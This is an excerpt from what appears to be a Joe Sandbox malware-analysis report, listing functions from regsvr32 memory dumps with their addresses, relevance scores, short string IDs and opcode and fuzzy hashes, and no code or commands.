                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 9c9a505e11390fee30cde8d58ba8d3236255a76ec469928530f6db279ba29baa
                                                                                                                                                                                                            • Instruction ID: 1f7af7de608e037a3e69fafdab2b7a4d19b0596ea53e23cf5e8b59c7fdfa90c1
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9c9a505e11390fee30cde8d58ba8d3236255a76ec469928530f6db279ba29baa
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D151C432700B9489FBA1DB72A8447DE7BA1B7587D4F148225FE9827B99DF38C605D700
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028F1030 Relevance: 1.6, Strings: 1, Instructions: 357COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: ef
                                                                                                                                                                                                            • API String ID: 0-3522424648
                                                                                                                                                                                                            • Opcode ID: 63cf04038136136116a979567ba4b26417661d5f843165bc7989bb71bb8234a9
                                                                                                                                                                                                            • Instruction ID: b32d228eac93b743e7cba170875d3d84198894b5bf3530b9917a99001ca25dc3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 63cf04038136136116a979567ba4b26417661d5f843165bc7989bb71bb8234a9
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 68022874A04709EFDB58DF68C08959EBBF2FB44308F00816DE80AEB250D775DA59CB85
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028EEF14 Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: x]!-
                                                                                                                                                                                                            • API String ID: 0-585868058
                                                                                                                                                                                                            • Opcode ID: cf2a29744dbdbd02a151a4b044d1109f6beb7998a165a5b3606498e8daacfd79
                                                                                                                                                                                                            • Instruction ID: a8b5accab82a320cce6801d2d61f344791b79fead5870e5fdbe94d52b2aee439
                                                                                                                                                                                                            • Opcode Fuzzy Hash: cf2a29744dbdbd02a151a4b044d1109f6beb7998a165a5b3606498e8daacfd79
                                                                                                                                                                                                            • Instruction Fuzzy Hash: ECD189B1A0060DCFDBA8CF78C54A5DD7BF1FB48308F606129E826AA2B6D7749905CF54
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028FA8B0 Relevance: 1.4, Strings: 1, Instructions: 195COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: }^O
                                                                                                                                                                                                            • API String ID: 0-3039680174
                                                                                                                                                                                                            • Opcode ID: 2737519d22680c9269c125336f90b0d45ca51200b7d26ea2addf6a8d31d5b6e5
                                                                                                                                                                                                            • Instruction ID: 9f5bd7a8e9285169bd57ede4de6234014e05c354fdc3a0fb5c84d98b990e3271
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2737519d22680c9269c125336f90b0d45ca51200b7d26ea2addf6a8d31d5b6e5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 55A17BB6502749CFDB98DF28C69A59D3BE1FF55308F004129FC1E9A2A0D3B4E925CB49
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028F4D20 Relevance: 1.4, Strings: 1, Instructions: 142COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: RH
                                                                                                                                                                                                            • API String ID: 0-2975065227
                                                                                                                                                                                                            • Opcode ID: da44171f9c80a2056ccb259cc2b9eac6e02ade2ac8d9ef905a94791c40a4a894
                                                                                                                                                                                                            • Instruction ID: db1e4ac99989e9934fa0a4a2b17ec8ca90628c5ee103b107c2d39de80a7de319
                                                                                                                                                                                                            • Opcode Fuzzy Hash: da44171f9c80a2056ccb259cc2b9eac6e02ade2ac8d9ef905a94791c40a4a894
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 935136751187848FC7A8DF18D4C66ABB7E1FB84310F90991DE9CEC7251DE70A88A8B46
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028EBE90 Relevance: 1.4, Strings: 1, Instructions: 132COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: Y
                                                                                                                                                                                                            • API String ID: 0-579211002
                                                                                                                                                                                                            • Opcode ID: c7ef7c05ef0c3c9f2aed6826f015ad160cfcc6abce9b29eb71b79f5d508516d5
                                                                                                                                                                                                            • Instruction ID: 679b7ec42e03dd0909c7def2f58cf3087766f22ec17e08ca503f9cd80cd0d1f8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c7ef7c05ef0c3c9f2aed6826f015ad160cfcc6abce9b29eb71b79f5d508516d5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8B51F4755107898BDB98CF28C88A0DD7BA1FB4931CF025318ED9EA62A1D77CD845CB49
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028ED6CC Relevance: 1.4, Strings: 1, Instructions: 125COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: vOs
                                                                                                                                                                                                            • API String ID: 0-1852020951
                                                                                                                                                                                                            • Opcode ID: 0a3c35978ef4d06ef910e88490b5bce2e9beff051be12035b9eadbcefa2f22bf
                                                                                                                                                                                                            • Instruction ID: 00224ccf12d8b57afdd7655c6450d77f6953a067233d73d0bc4d9a5341e4751a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0a3c35978ef4d06ef910e88490b5bce2e9beff051be12035b9eadbcefa2f22bf
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7A619DB190030E8FDB49CF68D48A5CE7FB0FB24398F204519E845A6260D7B896A8CFD5
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028E461C Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: *)
                                                                                                                                                                                                            • API String ID: 0-1811957435
                                                                                                                                                                                                            • Opcode ID: c39f41b8af2b9280dd7c00c4ba0ddd05394017a856c7f82ca50d576e38ac2643
                                                                                                                                                                                                            • Instruction ID: a4c275692890ba3b873de0aa27f033e3a3603ebaebc20debce1ecd84e8c55abc
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c39f41b8af2b9280dd7c00c4ba0ddd05394017a856c7f82ca50d576e38ac2643
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D331923461CB888FC728DF29D08556ABBE0FB99305F504A2EE58AC7365DB70D805CB82
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028EF77C Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: t
                                                                                                                                                                                                            • API String ID: 0-1935021737
                                                                                                                                                                                                            • Opcode ID: 783391770682b9c9d34a01018b97ccb4612aed757a5715f7015a6466eeb6abdd
                                                                                                                                                                                                            • Instruction ID: 2d44939c9f0c760571621eda01fd9b8eccb636f4915d0f4603ff9a93115fc038
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 783391770682b9c9d34a01018b97ccb4612aed757a5715f7015a6466eeb6abdd
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9631C03421CB448FE768DF2CD48516ABBE1FB96344F104A6DEACAC7266D730D805CB82
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 0290181C Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: __
                                                                                                                                                                                                            • API String ID: 0-2267946753
                                                                                                                                                                                                            • Opcode ID: 8f9b035c25ddab069e89f1d5b32d9e06551c62a3022c943f576078da68d92037
                                                                                                                                                                                                            • Instruction ID: ed11574131f427a5590ed35499c39402a7198ab00ec92c1a40360239830dcac3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8f9b035c25ddab069e89f1d5b32d9e06551c62a3022c943f576078da68d92037
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F241D0B0508B848BE758DF29C18941ABBF2FBCA748F504A2DF69A87364C775D845CB42
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028E9408 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: GSn
                                                                                                                                                                                                            • API String ID: 0-1733515909
                                                                                                                                                                                                            • Opcode ID: 120b4183c770ef369911dc760361451600c2e99f203226371e5481c8821bf4d7
                                                                                                                                                                                                            • Instruction ID: 2560f34267cc088a542d3cacccea48ab36fdcd3b72f3989b9c54c8ac10d256e2
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 120b4183c770ef369911dc760361451600c2e99f203226371e5481c8821bf4d7
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7351D7B090038E8FDF48DF64C84A5DE7BB1FB58358F104A1DEC66A6290D3B89664CF84
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 02908500 Relevance: 1.4, Strings: 1, Instructions: 103COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: 8=
                                                                                                                                                                                                            • API String ID: 0-237953557
                                                                                                                                                                                                            • Opcode ID: bb623fe5bad30cc0ccc512b27898bb82e9ca0e52d8794c79c7b053a60b518db3
                                                                                                                                                                                                            • Instruction ID: 4d05507837603db7008a72b849ee8b61fa0580333a0fdc31059a091e1cc84447
                                                                                                                                                                                                            • Opcode Fuzzy Hash: bb623fe5bad30cc0ccc512b27898bb82e9ca0e52d8794c79c7b053a60b518db3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7E314A30218B458BDB5CDF2CC49922ABBE1FBD9300F444A2DE58AD73A5DB34D845CB82
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028F20E0 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: K
                                                                                                                                                                                                            • API String ID: 0-425913083
                                                                                                                                                                                                            • Opcode ID: 2b1ae9da1385bdbe4b8d4d873491c8ef025a73cbd56fa24a9a5b2ec22b63fa4f
                                                                                                                                                                                                            • Instruction ID: be7a078d3a50dff306e4ba5defc8d36da88744855ccc135c39044881ddf98837
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2b1ae9da1385bdbe4b8d4d873491c8ef025a73cbd56fa24a9a5b2ec22b63fa4f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6941F7B180438ECFDB48CF68D8864DE7BB0FB58344F114A19E86AA6250D3B8D665CF85
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028F08CC Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: t"
                                                                                                                                                                                                            • API String ID: 0-2131657386
                                                                                                                                                                                                            • Opcode ID: a3a222a6e056c70518c09b2f7e5539db3b60aaf61629909d00af61b4973bd0e8
                                                                                                                                                                                                            • Instruction ID: f836568a22a03c3d3739504cc3a92ee7902ea4ec0376aab0319751a06598d234
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a3a222a6e056c70518c09b2f7e5539db3b60aaf61629909d00af61b4973bd0e8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: DA41F77080070D8BDF48CF64C48A0DE7FB0FB083A8F65621DE91AB6290D3B89585CF89
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028F3CD4 Relevance: 1.3, Strings: 1, Instructions: 78COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: gLv
                                                                                                                                                                                                            • API String ID: 0-1669999040
                                                                                                                                                                                                            • Opcode ID: d372408e4ccfa21733394c795309bb98bbbf8ce06b144d4f85a8e8de8872e02b
                                                                                                                                                                                                            • Instruction ID: 18c7b4f20c9351ad513b8ae9815dd507d73fa9e18c2db0700da68336ab01ee0f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d372408e4ccfa21733394c795309bb98bbbf8ce06b144d4f85a8e8de8872e02b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A541A2B190078E8FDF84CF64C88A4DE7BB0FB18358F104619E866A6290D3B89665CF95
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028E18DC Relevance: 1.3, Strings: 1, Instructions: 77COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: 2|
                                                                                                                                                                                                            • API String ID: 0-4112153497
                                                                                                                                                                                                            • Opcode ID: c8d3a13c8ccf64a8a58613b82b71848b75fef30a95d8cbfed718dfac3d203234
                                                                                                                                                                                                            • Instruction ID: 3451d35b5e069293cb25047193449685d5cdf1edf4b5f1c720bab5b15fb8f21c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c8d3a13c8ccf64a8a58613b82b71848b75fef30a95d8cbfed718dfac3d203234
                                                                                                                                                                                                            • Instruction Fuzzy Hash: CD31E3715183408FD768DF28C58A54BBBF1FBC6704F50891DE6CA8A260DB76D849CB03
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 02904E8C Relevance: 1.3, Strings: 1, Instructions: 74COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: v)v
                                                                                                                                                                                                            • API String ID: 0-2248367734
                                                                                                                                                                                                            • Opcode ID: 2bcb51d8d69df24c6edafa72637552a2373937b3983906909be42b2c69647502
                                                                                                                                                                                                            • Instruction ID: 9621d4cd7b8247f7edff4d500ba0973206047cb8445dacb43466fd858fc2c44a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2bcb51d8d69df24c6edafa72637552a2373937b3983906909be42b2c69647502
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C631FEB0D106189BDF88DFB8D98A4DDBBF0BB48308F50822DD816B6290D7795A45CF68
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028FA244 Relevance: 1.3, Strings: 1, Instructions: 73COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: b
                                                                                                                                                                                                            • API String ID: 0-1908338681
                                                                                                                                                                                                            • Opcode ID: dddb38d3eca3b718f76d068eb3649ef697cdbcc6fe538854f7f679c62e5ae1f4
                                                                                                                                                                                                            • Instruction ID: 17bdd88a76ea742b17f3307574b3be47e3e99a9a8e87152f7e628db9e49eb398
                                                                                                                                                                                                            • Opcode Fuzzy Hash: dddb38d3eca3b718f76d068eb3649ef697cdbcc6fe538854f7f679c62e5ae1f4
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 09318BB55187808BD748DF28C08651ABBE1BBCC308F404B1DF8CAEB2A1D778D645CB4A
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028ED33C Relevance: 1.3, Strings: 1, Instructions: 72COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: Y
                                                                                                                                                                                                            • API String ID: 0-579211002
                                                                                                                                                                                                            • Opcode ID: ecd3080a44302933cb34d055b18508fc771149b61013eb4241d4c9c3597933d5
                                                                                                                                                                                                            • Instruction ID: 3905b0f92365bb91672009248d65bd91db3d35b841bf4746a7ab911bc2e22770
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ecd3080a44302933cb34d055b18508fc771149b61013eb4241d4c9c3597933d5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A33199B0628781AFD78CDF28D49692EBBE1BBD9314F816A1DF9868B350D774D404CB42
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028F0E2C Relevance: 1.3, Strings: 1, Instructions: 64COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: 0}
                                                                                                                                                                                                            • API String ID: 0-2955618701
                                                                                                                                                                                                            • Opcode ID: 3bc7749b2bfb2771dde145a478a06cddc01c68d1a6300aeac6f15df74fb2e7de
                                                                                                                                                                                                            • Instruction ID: 3e7e0eca6b7df2cf9e22f590a0720919f810bbceeb8c715e312b2ca61f84fb9a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3bc7749b2bfb2771dde145a478a06cddc01c68d1a6300aeac6f15df74fb2e7de
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 95319DB052C380AFD388DF28D48591BBBE1BB88354F816A1DF8869A3A0D374D414CB47
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028F97CC Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: S}
                                                                                                                                                                                                            • API String ID: 0-4277866985
                                                                                                                                                                                                            • Opcode ID: 4c14e8efe554566b3b6f64fbbe1a0bfeeafcc62cba18a000d9c8f8486cba644e
                                                                                                                                                                                                            • Instruction ID: 6eca092c98c3adfaed0121b155035ca3d2c3a6a6fc12d10904b790ccf03c6d1f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4c14e8efe554566b3b6f64fbbe1a0bfeeafcc62cba18a000d9c8f8486cba644e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D4317EB0528781AFD398DF28D49A81BBBF1FB88304F806E2DF88687294D775D445CB02
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028E98AC Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
